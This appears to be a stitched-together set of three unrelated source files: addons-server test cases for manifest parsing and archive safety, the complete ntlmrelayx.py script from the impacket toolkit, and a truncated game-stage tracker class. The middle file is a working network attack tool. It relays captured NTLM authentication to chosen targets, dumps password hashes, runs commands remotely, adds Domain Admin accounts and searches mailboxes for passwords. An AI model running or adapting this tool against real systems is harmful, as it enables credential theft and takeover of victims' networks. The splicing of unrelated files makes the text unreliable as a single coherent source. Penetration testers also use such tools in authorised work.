assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '66.0')
firefox_max_version = self.create_appversion('firefox', '66.*')
android_min_version = self.create_appversion('android', '66.0')
android_max_version = self.create_appversion('android', '66.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=66.0',
'strict_max_version': '=66.*',
'id': '@random',
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_theme_json_extracted(self):
# Check theme data is extracted from the manifest and returned.
data = {'theme': {'colors': {'tab_background_text': '#3deb60'}}}
assert self.parse(data)['theme'] == data['theme']
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_max_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == ('Unknown "strict_max_version" 76.0 for Firefox')
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# In the parent class this method would bump the min_version to 48.0
# because that's the first version to support
# browser_specific_settings, but in static themes we bump it even
# higher because of the minimum version when we started supporting
# static themes themselves.
data = {
'browser_specific_settings': {
'gecko': {'strict_min_version': '42.0', 'id': '@random'}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
@pytest.mark.parametrize(
'filename, expected_files',
[
(
'webextension_no_id.xpi',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
(
'webextension_no_id.zip',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
(
'webextension_no_id.tar.gz',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
(
'webextension_no_id.tar.bz2',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
],
)
def test_extract_extension_to_dest(filename, expected_files):
extension_file = f'src/olympia/files/fixtures/files/{filename}'
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
temp_folder = utils.extract_extension_to_dest(extension_file)
assert sorted(os.listdir(temp_folder)) == expected_files
# fsync isn't called by default
assert not fsync_mock.called
@pytest.mark.parametrize(
'filename',
[
'webextension_no_id.xpi',
'webextension_no_id.zip',
'webextension_no_id.tar.bz2',
'webextension_no_id.tar.gz',
],
)
def test_extract_extension_to_dest_call_fsync(filename):
extension_file = f'src/olympia/files/fixtures/files/{filename}'
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
utils.extract_extension_to_dest(extension_file, force_fsync=True)
# fsync isn't called by default
assert fsync_mock.called
def test_extract_extension_to_dest_non_existing_archive():
extension_file = 'src/olympia/files/fixtures/files/doesntexist.zip'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(FileNotFoundError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
def test_extract_extension_to_dest_invalid_archive():
extension_file = 'src/olympia/files/fixtures/files/invalid-cp437-encoding.xpi'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(forms.ValidationError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
@pytest.fixture
def file_obj():
addon = amo.tests.addon_factory()
addon.update(guid='xxxxx')
version = addon.current_version
return version.all_files[0]
@pytestmark
def test_bump_version_in_manifest_json(file_obj):
AppVersion.objects.create(
application=amo.FIREFOX.id, version=amo.DEFAULT_WEBEXT_MIN_VERSION
)
AppVersion.objects.create(
application=amo.FIREFOX.id, version=amo.DEFAULT_WEBEXT_MAX_VERSION
)
AppVersion.objects.create(
application=amo.ANDROID.id, version=amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
)
AppVersion.objects.create(
application=amo.ANDROID.id, version=amo.DEFAULT_WEBEXT_MAX_VERSION
)
with amo.tests.copy_file(
'src/olympia/files/fixtures/files/webextension.xpi', file_obj.file_path
):
utils.update_version_number(file_obj, '0.0.1.1-signed')
parsed = utils.parse_xpi(file_obj.file_path)
assert parsed['version'] == '0.0.1.1-signed'
def test_extract_translations_simple(file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
messages = utils.extract_translations(file_obj)
assert list(sorted(messages.keys())) == [
'de',
'en-US',
'ja',
'nb-NO',
'nl',
'ru',
'sv-SE',
]
@mock.patch('olympia.files.utils.zipfile.ZipFile.read')
def test_extract_translations_fail_silent_invalid_file(read_mock, file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
read_mock.side_effect = KeyError
# Does not raise an exception
utils.extract_translations(file_obj)
read_mock.side_effect = IOError
# Does not raise an exception too
utils.extract_translations(file_obj)
# We don't fail on invalid JSON too, this is addons-linter domain
read_mock.side_effect = ValueError
utils.extract_translations(file_obj)
# But everything else...
read_mock.side_effect = TypeError
with pytest.raises(TypeError):
utils.extract_translations(file_obj)
def test_get_all_files():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
assert utils.get_all_files(tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
shutil.rmtree(tempdir)
assert not os.path.exists(tempdir)
def test_get_all_files_strip_prefix_no_prefix_silent():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, strip_prefix=tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, prefix='/foo/bar') == [
'/foo/bar' + os.path.join(tempdir, 'dir1'),
'/foo/bar' + os.path.join(tempdir, 'dir1', 'foo2'),
'/foo/bar' + os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix_with_strip_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
result = utils.get_all_files(tempdir, strip_prefix=tempdir, prefix='/foo/bar')
assert result == [
os.path.join('/foo', 'bar', 'dir1'),
os.path.join('/foo', 'bar', 'dir1', 'foo2'),
os.path.join('/foo', 'bar', 'foo1'),
]
def test_lock_with_lock_attained():
with utils.lock(settings.TMP_PATH, 'test-lock-lock2') as lock_attained:
assert lock_attained
@contextlib.contextmanager
def _run_lock_holding_process(lock_name, sleep):
def _other_process_holding_lock():
with utils.lock(settings.TMP_PATH, lock_name) as lock_attained:
assert lock_attained
time.sleep(sleep)
other_process = multiprocessing.Process(target=_other_process_holding_lock)
other_process.start()
# Give the process some time to acquire the lock
time.sleep(0.2)
yield other_process
other_process.join()
def test_lock_timeout():
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting for 3 seconds allows us to attain the lock from the parent
# process.
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=3)
with lock as lock_attained:
assert lock_attained
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting only 1 second fails to acquire the lock
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=1)
with lock as lock_attained:
assert not lock_attained
class TestResolvei18nMessage:
def test_no_match(self):
assert utils.resolve_i18n_message('foo', {}, '') == 'foo'
def test_locale_found(self):
messages = {'de': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de')
assert result == 'bar'
def test_uses_default_locale(self):
messages = {'en-US': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de', 'en')
assert result == 'bar'
def test_no_locale_match(self):
# Neither `locale` or `locale` are found, "message" is returned
# unchanged
messages = {'fr': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de', 'en')
assert result == '__MSG_foo__'
def test_field_not_set(self):
"""Make sure we don't fail on messages that are `None`
Fixes https://github.com/mozilla/addons-server/issues/3067
"""
result = utils.resolve_i18n_message(None, {}, 'de', 'en')
assert result is None
def test_field_no_string(self):
"""Make sure we don't fail on messages that are no strings"""
result = utils.resolve_i18n_message([], {}, 'de', 'en')
assert result == []
def test_corrects_locales(self):
messages = {'en-US': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == 'bar'
def test_ignore_wrong_format(self):
messages = {'en-US': {'foo': 'bar'}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == '__MSG_foo__'
class TestXMLVulnerabilities(TestCase):
"""Test a few known vulnerabilities to make sure
our defusedxml patching is applied automatically.
This doesn't replicate all defusedxml tests.
"""
def test_lxml_XMLParser_no_resolve_entities(self):
with pytest.raises(NotSupportedError):
lxml.etree.XMLParser(resolve_entities=True)
# not setting it works
lxml.etree.XMLParser()
# Setting it explicitly to `False` is fine too.
lxml.etree.XMLParser(resolve_entities=False)
class TestGetBackgroundImages(TestCase):
file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme.zip'
)
file_obj_dep = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme_deprecated.zip'
)
def test_get_background_images(self):
data = {'images': {'theme_frame': 'weta.png'}}
images = utils.get_background_images(self.file_obj, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_deprecated(self):
data = {'images': {'headerURL': 'weta.png'}}
images = utils.get_background_images(self.file_obj_dep, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_no_theme_data_provided(self):
images = utils.get_background_images(self.file_obj, theme_data=None)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_missing(self):
data = {'images': {'theme_frame': 'missing_file.png'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_not_image(self):
self.file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme_non_image.zip'
)
data = {'images': {'theme_frame': 'not_an_image.js'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_with_additional_imgs(self):
self.file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme_tiled.zip'
)
data = {
'images': {
'theme_frame': 'empty.png',
'additional_backgrounds': [
'transparent.gif',
'missing_&_ignored.png',
'weta_for_tiling.png',
],
}
}
images = utils.get_background_images(self.file_obj, data)
assert len(images.items()) == 3
assert len(images['empty.png']) == 332
assert len(images['transparent.gif']) == 42
assert len(images['weta_for_tiling.png']) == 93371
# And again but only with the header image
images = utils.get_background_images(self.file_obj, data, header_only=True)
assert len(images.items()) == 1
assert len(images['empty.png']) == 332
@pytest.mark.parametrize(
'value, expected',
[
(1, '1/1/1'),
(1, '1/1/1'),
(12, '2/12/12'),
(123, '3/23/123'),
(123456789, '9/89/123456789'),
],
)
def test_id_to_path(value, expected):
assert utils.id_to_path(value) == expected
class TestSafeZip(TestCase):
def test_raises_error_for_invalid_webextension_xpi(self):
with pytest.raises(zipfile.BadZipFile):
utils.SafeZip(get_addon_file('invalid_webextension.xpi'))
def test_raises_validation_error_when_uncompressed_size_is_too_large(self):
with override_settings(MAX_ZIP_UNCOMPRESSED_SIZE=1000):
with pytest.raises(forms.ValidationError):
# total uncompressed size of this xpi is 126kb
utils.SafeZip(get_addon_file('mozilla_static_theme.zip'))
class TestArchiveMemberValidator(TestCase):
# We cannot easily test `archive_member_validator` so let's test
# `_validate_archive_member_name_and_size` instead.
def test_raises_when_filename_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(None, 123)
def test_raises_when_filesize_is_none(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('filename', None)
def test_raises_when_filename_is_dot_dot_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('../', 123)
def test_raises_when_filename_starts_with_slash(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('/..', 123)
def test_raises_when_filename_is_dot_dot(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size('..', 123)
def test_does_not_raise_when_filename_is_dot_dot_extension(self):
utils._validate_archive_member_name_and_size('foo..svg', 123)
@override_settings(FILE_UNZIP_SIZE_LIMIT=100)
def test_raises_when_filesize_is_above_limit(self):
with pytest.raises(forms.ValidationError):
utils._validate_archive_member_name_and_size(
'filename', settings.FILE_UNZIP_SIZE_LIMIT + 100
)
class TestWriteCrxAsXpi(TestCase):
def setUp(self):
self.tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
self.target = os.path.join(self.tempdir, 'target')
self.prefix = 'src/olympia/files/fixtures/files'
def tearDown(self):
storage.delete(self.target)
storage.delete(self.tempdir)
# Note: those tests are also performed in test_models.py using
# FileUpload.from_post() to ensure the relevant exception is caught if they
# are raised and the add-on is then fully processed correctly. These just
# test the underlying function that does the conversion from crx to xpi.
def test_webextension_crx(self):
path = os.path.join(self.prefix, 'webextension.crx')
with open(path, 'rb') as source:
utils.write_crx_as_xpi(source, self.target)
assert zipfile.is_zipfile(self.target)
def test_webextension_crx_large(self):
path = os.path.join(self.prefix, 'https-everywhere.crx')
with open(path, 'rb') as source:
utils.write_crx_as_xpi(source, self.target)
assert zipfile.is_zipfile(self.target)
def test_webextension_crx_version_3(self):
path = os.path.join(self.prefix, 'webextension_crx3.crx')
with open(path, 'rb') as source:
utils.write_crx_as_xpi(source, self.target)
assert zipfile.is_zipfile(self.target)
def test_webextension_crx_not_a_crx(self):
file_ = SimpleUploadedFile(
'foo.crx', b'Cr42\x02\x00\x00\x00&\x01\x00\x00\x00\x01\x00\x00'
)
with self.assertRaises(utils.InvalidOrUnsupportedCrx) as exc:
utils.write_crx_as_xpi(file_, self.target)
assert str(exc.exception) == 'CRX file does not start with Cr24'
# It's the caller responsability to move the original file there, as if
# it was a regular zip, since we couldn't convert it.
assert not storage.exists(self.target)
def test_webextension_crx_version_unsupported(self):
file_ = SimpleUploadedFile(
'foo.crx', b'Cr24\x04\x00\x00\x00&\x01\x00\x00\x00\x01\x00\x00'
)
with self.assertRaises(utils.InvalidOrUnsupportedCrx) as exc:
utils.write_crx_as_xpi(file_, self.target)
assert str(exc.exception) == 'Unsupported CRX version'
# It's the caller responsability to move the original file there, as if
# it was a regular zip, since we couldn't convert it.
assert not storage.exists(self.target)
def test_webextension_crx_version_cant_unpack(self):
file_ = SimpleUploadedFile(
'foo.crx', b'Cr24\x02\x00\x00\x00&\x00\x00\x00\x01\x00\x00'
)
with self.assertRaises(utils.InvalidOrUnsupportedCrx) as exc:
utils.write_crx_as_xpi(file_, self.target)
assert str(exc.exception) == 'Invalid or corrupt CRX file'
# It's the caller responsability to move the original file there, as if
# it was a regular zip, since we couldn't convert it.
assert not storage.exists(self.target)
|
ntlmrelayx.py
|
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Generic NTLM Relay Module
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema / Fox-IT (https://www.fox-it.com)
#
# Description:
# This module performs the SMB Relay attacks originally discovered
# by cDc extended to many target protocols (SMB, MSSQL, LDAP, etc).
# It receives a list of targets and for every connection received it
# will choose the next target and try to relay the credentials. Also, if
# specified, it will first to try authenticate against the client connecting
# to us.
#
# It is implemented by invoking a SMB and HTTP Server, hooking to a few
# functions and then using the specific protocol clients (e.g. SMB, LDAP).
# It is supposed to be working on any LM Compatibility level. The only way
# to stop this attack is to enforce on the server SPN checks and or signing.
#
# If the authentication against the targets succeeds, the client authentication
# succeeds as well and a valid connection is set against the local smbserver.
# It's up to the user to set up the local smbserver functionality. One option
# is to set up shares with whatever files you want to so the victim thinks it's
# connected to a valid SMB server. All that is done through the smb.conf file or
# programmatically.
#
import argparse
import sys
import logging
import cmd
try:
from urllib.request import ProxyHandler, build_opener, Request
except ImportError:
from urllib2 import ProxyHandler, build_opener, Request
import json
from threading import Thread
from impacket import version
from impacket.examples import logger
from impacket.examples.ntlmrelayx.servers import SMBRelayServer, HTTPRelayServer
from impacket.examples.ntlmrelayx.utils.config import NTLMRelayxConfig
from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor, TargetsFileWatcher
from impacket.examples.ntlmrelayx.servers.socksserver import SOCKS
RELAY_SERVERS = []
class MiniShell(cmd.Cmd):
def __init__(self, relayConfig, threads):
cmd.Cmd.__init__(self)
self.prompt = 'ntlmrelayx> '
self.tid = None
self.relayConfig = relayConfig
self.intro = 'Type help for list of commands'
self.relayThreads = threads
self.serversRunning = True
@staticmethod
def printTable(items, header):
colLen = []
for i, col in enumerate(header):
rowMaxLen = max([len(row[i]) for row in items])
colLen.append(max(rowMaxLen, len(col)))
outputFormat = ' '.join(['{%d:%ds} ' % (num, width) for num, width in enumerate(colLen)])
# Print header
print(outputFormat.format(*header))
print(' '.join(['-' * itemLen for itemLen in colLen]))
# And now the rows
for row in items:
print(outputFormat.format(*row))
def emptyline(self):
pass
def do_targets(self, line):
for url in self.relayConfig.target.originalTargets:
print(url.geturl())
return
def do_socks(self, line):
headers = ["Protocol", "Target", "Username", "AdminStatus", "Port"]
url = "http://localhost:9090/ntlmrelayx/api/v1.0/relays"
try:
proxy_handler = ProxyHandler({})
opener = build_opener(proxy_handler)
response = Request(url)
r = opener.open(response)
result = r.read()
items = json.loads(result)
except Exception as e:
logging.error("ERROR: %s" % str(e))
else:
if len(items) > 0:
self.printTable(items, header=headers)
else:
logging.info('No Relays Available!')
def do_startservers(self, line):
if not self.serversRunning:
start_servers(options, self.relayThreads)
self.serversRunning = True
logging.info('Relay servers started')
else:
logging.error('Relay servers are already running!')
def do_stopservers(self, line):
if self.serversRunning:
stop_servers(self.relayThreads)
self.serversRunning = False
logging.info('Relay servers stopped')
else:
logging.error('Relay servers are already stopped!')
def do_exit(self, line):
print("Shutting down, please wait!")
return True
def do_EOF(self, line):
return self.do_exit(line)
def start_servers(options, threads):
for server in RELAY_SERVERS:
#Set up config
c = NTLMRelayxConfig()
c.setProtocolClients(PROTOCOL_CLIENTS)
c.setRunSocks(options.socks, socksServer)
c.setTargets(targetSystem)
c.setExeFile(options.e)
c.setCommand(options.c)
c.setRaw(options.raw)
c.setEnumLocalAdmins(options.enum_local_admins)
c.setEncoding(codec)
c.setMode(mode)
c.setAttacks(PROTOCOL_ATTACKS)
c.setLootdir(options.lootdir)
c.setOutputFile(options.output_file)
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access)
c.setMSSQLOptions(options.query)
c.setInteractive(options.interactive)
c.setIMAPOptions(options.keyword, options.mailbox, options.all, options.imap_max)
c.setIPv6(options.ipv6)
c.setWpadOptions(options.wpad_host, options.wpad_auth_num)
c.setSMB2Support(options.smb2support)
c.setInterfaceIp(options.interface_ip)
if server is HTTPRelayServer:
c.setListeningPort(options.http_port)
elif server is SMBRelayServer:
c.setListeningPort(options.smb_port)
#If the redirect option is set, configure the HTTP server to redirect targets to SMB
if server is HTTPRelayServer and options.r is not None:
c.setMode('REDIRECT')
c.setRedirectHost(options.r)
#Use target randomization if configured and the server is not SMB
#SMB server at the moment does not properly store active targets so selecting them randomly will cause issues
if server is not SMBRelayServer and options.random:
c.setRandomTargets(True)
s = server(c)
s.start()
threads.add(s)
return c
def stop_servers(threads):
todelete = []
for thread in threads:
if isinstance(thread, RELAY_SERVERS):
thread.server.shutdown()
todelete.append(thread)
# Now remove threads from the set
for thread in todelete:
threads.remove(thread)
del thread
# Process command-line arguments.
if __name__ == '__main__':
# Init the example's logger theme
logger.init()
print(version.BANNER)
#Parse arguments
parser = argparse.ArgumentParser(add_help = False, description = "For every connection received, this module will "
"try to relay that connection to specified target(s) system or the original client")
parser._optionals.title = "Main options"
#Main arguments
parser.add_argument("-h","--help", action="help", help='show this help message and exit')
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
parser.add_argument('-t',"--target", action='store', metavar = 'TARGET', help='Target to relay the credentials to, '
'can be an IP, hostname or URL like smb://server:445 If unspecified, it will relay back to the client')
parser.add_argument('-tf', action='store', metavar = 'TARGETSFILE', help='File that contains targets by hostname or '
'full URL, one per line')
parser.add_argument('-w', action='store_true', help='Watch the target file for changes and update target list '
'automatically (only valid with -tf)')
parser.add_argument('-i','--interactive', action='store_true',help='Launch an smbclient console instead'
'of executing a command after a successful relay. This console will listen locally on a '
' tcp port and can be reached with for example netcat.')
# Interface address specification
parser.add_argument('-ip','--interface-ip', action='store', metavar='INTERFACE_IP', help='IP address of interface to '
'bind SMB and HTTP servers',default='')
serversoptions = parser.add_mutually_exclusive_group()
serversoptions.add_argument('--no-smb-server', action='store_true', help='Disables the SMB server')
serversoptions.add_argument('--no-http-server', action='store_true', help='Disables the HTTP server')
parser.add_argument('--smb-port', type=int, help='Port to listen on smb server', default=445)
parser.add_argument('--http-port', type=int, help='Port to listen on http server', default=80)
parser.add_argument('-ra','--random', action='store_true', help='Randomize target selection (HTTP server only)')
parser.add_argument('-r', action='store', metavar = 'SMBSERVER', help='Redirect HTTP requests to a file:// path on SMBSERVER')
parser.add_argument('-l','--lootdir', action='store', type=str, required=False, metavar = 'LOOTDIR',default='.', help='Loot '
'directory in which gathered loot such as SAM dumps will be stored (default: current directory).')
parser.add_argument('-of','--output-file', action='store',help='base output filename for encrypted hashes. Suffixes '
'will be added for ntlm and ntlmv2')
parser.add_argument('-codec', action='store', help='Sets encoding used (codec) from the target\'s output (default '
'"%s"). If errors are detected, run chcp.com at the target, '
'map the result with '
'https://docs.python.org/2.4/lib/standard-encodings.html and then execute ntlmrelayx.py '
'again with -codec and the corresponding codec ' % sys.getdefaultencoding())
parser.add_argument('-smb2support', action="store_true", default=False, help='SMB2 Support (experimental!)')
parser.add_argument('-socks', action='store_true', default=False,
help='Launch a SOCKS proxy for the connection relayed')
parser.add_argument('-wh','--wpad-host', action='store',help='Enable serving a WPAD file for Proxy Authentication attack, '
'setting the proxy host to the one supplied.')
parser.add_argument('-wa','--wpad-auth-num', action='store',help='Prompt for authentication N times for clients without MS16-077 installed '
'before serving a WPAD file.')
parser.add_argument('-6','--ipv6', action='store_true',help='Listen on both IPv6 and IPv4')
#SMB arguments
smboptions = parser.add_argument_group("SMB client options")
smboptions.add_argument('-e', action='store', required=False, metavar = 'FILE', help='File to execute on the target system. '
'If not specified, hashes will be dumped (secretsdump.py must be in the same directory)')
smboptions.add_argument('-c', action='store', type=str, required=False, metavar = 'COMMAND', help='Command to execute on '
'target system. If not specified, hashes will be dumped (secretsdump.py must be in the same '
'directory).')
smboptions.add_argument('--raw', action='store_true', help='Executes the raw supplied command without first saving it as a batch file. (No output)')
smboptions.add_argument('--enum-local-admins', action='store_true', required=False, help='If relayed user is not admin, attempt SAMR lookup to see who is (only works pre Win 10 Anniversary)')
#MSSQL arguments
mssqloptions = parser.add_argument_group("MSSQL client options")
mssqloptions.add_argument('-q','--query', action='append', required=False, metavar = 'QUERY', help='MSSQL query to execute'
'(can specify multiple)')
#LDAP options
ldapoptions = parser.add_argument_group("LDAP client options")
ldapoptions.add_argument('--no-dump', action='store_false', required=False, help='Do not attempt to dump LDAP information')
ldapoptions.add_argument('--no-da', action='store_false', required=False, help='Do not attempt to add a Domain Admin')
ldapoptions.add_argument('--no-acl', action='store_false', required=False, help='Disable ACL attacks')
ldapoptions.add_argument('--no-validate-privs', action='store_false', required=False, help='Do not attempt to enumerate privileges, assume permissions are granted to escalate a user via ACL attacks')
ldapoptions.add_argument('--escalate-user', action='store', required=False, help='Escalate privileges of this user instead of creating a new one')
ldapoptions.add_argument('--add-computer', action='store_true', required=False, help='Attempt to add a new computer account')
ldapoptions.add_argument('--delegate-access', action='store_true', required=False, help='Delegate access on relayed computer account to the specified account')
#IMAP options
imapoptions = parser.add_argument_group("IMAP client options")
imapoptions.add_argument('-k','--keyword', action='store', metavar="KEYWORD", required=False, default="password", help='IMAP keyword to search for. '
'If not specified, will search for mails containing "password"')
imapoptions.add_argument('-m','--mailbox', action='store', metavar="MAILBOX", required=False, default="INBOX", help='Mailbox name to dump. Default: INBOX')
imapoptions.add_argument('-a','--all', action='store_true', required=False, help='Instead of searching for keywords, '
'dump all emails')
imapoptions.add_argument('-im','--imap-max', action='store',type=int, required=False,default=0, help='Max number of emails to dump '
'(0 = unlimited, default: no limit)')
try:
options = parser.parse_args()
except Exception as e:
logging.error(str(e))
sys.exit(1)
if options.debug is True:
logging.getLogger().setLevel(logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger('impacket.smbserver').setLevel(logging.ERROR)
# Let's register the protocol clients we have
# ToDo: Do this better somehow
from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
if options.codec is not None:
codec = options.codec
else:
codec = sys.getdefaultencoding()
if options.target is not None:
logging.info("Running in relay mode to single host")
mode = 'RELAY'
targetSystem = TargetsProcessor(singleTarget=options.target, protocolClients=PROTOCOL_CLIENTS)
else:
if options.tf is not None:
#Targetfile specified
logging.info("Running in relay mode to hosts in targetfile")
targetSystem = TargetsProcessor(targetListFile=options.tf, protocolClients=PROTOCOL_CLIENTS)
mode = 'RELAY'
else:
logging.info("Running in reflection mode")
targetSystem = None
mode = 'REFLECTION'
if not options.no_smb_server:
RELAY_SERVERS.append(SMBRelayServer)
if not options.no_http_server:
RELAY_SERVERS.append(HTTPRelayServer)
if options.r is not None:
logging.info("Running HTTP server in redirect mode")
if targetSystem is not None and options.w:
watchthread = TargetsFileWatcher(targetSystem)
watchthread.start()
threads = set()
socksServer = None
if options.socks is True:
# Start a SOCKS proxy in the background
socksServer = SOCKS()
socksServer.daemon_threads = True
socks_thread = Thread(target=socksServer.serve_forever)
socks_thread.daemon = True
socks_thread.start()
threads.add(socks_thread)
c = start_servers(options, threads)
print("")
logging.info("Servers started, waiting for connections")
try:
if options.socks:
shell = MiniShell(c, threads)
shell.cmdloop()
else:
sys.stdin.read()
except KeyboardInterrupt:
pass
else:
pass
if options.socks is True:
socksServer.shutdown()
del socksServer
for s in threads:
del s
sys.exit(0)
|
tracker.py
|
import multiprocessing
from tft import utils
class Tracker:
def __init__(self, players, file_name=None):
self.__unitLookupTable = initialize_unit_lookup_table()
manager = multiprocessing.Manager()
self.__stages = manager.dict()
self.__current_stage = "0-0"
self.__players = players
self.__file_name = file_name
if file_name:
utils.create_json_array_file(self.__file_name)
ctx = multiprocessing.get_context('spawn')
self.__entry_queue = ctx.SimpleQueue()
self.__process = ctx.Process(target=self.addEntries)
def track(self):
self.__process.start()
def getEntryQueue(self):
return self.__entry_queue
def getStages(self):
return self.__stages
def writeToFile(self):
self.__entry_queue.put({"mode": "finish", "contents": {"stage": "0-0"}})
self.__process.join()
print("Attempting to save to file ...")
print(self.__stages.copy())
if self.__file_name:
print("Saving to file")
utils.append_to_json_array_file(self.__file_name, self.__stages.copy())
def hasStageChanged(self, stage):
"""
Determines whether or not the stage has changed.
If the stage has changed, the current stage is updated
:param stage: string with format (x-y)
:return: boolean
"""
result = self.__current_stage != stage
if result:
self.__current_stage = stage
